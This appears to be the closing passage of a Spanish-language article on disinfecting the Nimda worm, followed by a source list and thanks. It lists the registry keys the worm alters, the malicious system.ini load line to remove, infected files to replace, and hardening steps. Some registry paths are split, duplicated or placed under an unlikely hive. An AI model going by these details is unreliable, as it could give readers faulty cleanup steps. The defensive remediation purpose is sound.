Desinfeccin del Nimda: Los pasos para desinfectar el Nimda han sido sacados de la Incidents Mailing list de Jeffrey Isherwood Reparar las llaves modificadas del registro: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ HideFileExt HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ HideFileExt HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ Hidden HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ ShowSuperHidden El Nimda crea la siguiente llave: HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfac es Todas las claves de la siguiente llave son borradas para desactivar la seguridad de los recursos compartidos: HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Sec urity Borra la siguiente linea del system.ini y reinicia el PC: [boot] shell=explorer.exe load.exe -dontrunold Los siguientes archivos son infectados por el Nimda, debes borrarlos y reponerlos de otro PC o de un Backup

MMC.EXE LOAD.EXE RICHED20.DLL ADMIN.DLL WININIT.INI y borra todos los archivos de los directorios temporales: \Temp\ \Windows\Temp\ \Documents and Settings\%Username%\Local Settings\Temp Ahora reinicia. Borra los *.eml, *.nws infectados Borra el cdigo JavaScript aadido al final de los HTM, HTML, ASP. Desactiva la cuenta "Guest" (invitado) y qutale los permisos de administrador. Comprueba los permisos de los recursos compartidos. Actualiza tu PC con los parches adecuados.

BIBLIOGRAFIA Y AGRADECIMIENTOS
Kriptpolis: www.kriptopolis.com Portal de seguridad y divulgacin. The Wild List Organitation International: www.wildlist.org Organizacin de alerta sobre virus CyruxNET: www.cjb.net Portal de informacin sobre fallos informticos. guninski: http://www.guninski.com/javaea.html Pagina de guninski.Cazador de bugs. securityfocus: http://www.securityfocus.com Portal sobre seguridad. Microsoft: www.microsoft.com Sin comentarios. Pandasoftware: www.pandasoftware.es Idem Slipstick Systems: www.slipstick.com Empresa de software de antivirus. hacksoft: www.hacksoft.com.pe Empresa peruana de antivirus. CERT: www.cert.org Centro de seguridad en internet GFI: www.gfisoftware.com Empresa de software de seguridad cknown: www.cknow.com Idem. Mis agradecimientos a: Carlos Perez por guiarme entre la inmensa informacin, Antonio Valls Obrer por su inters y sus busquedas de ltima hora, Pablo Lemos Ochando y Francisco Garcia Montaner por su ayuda y consejos.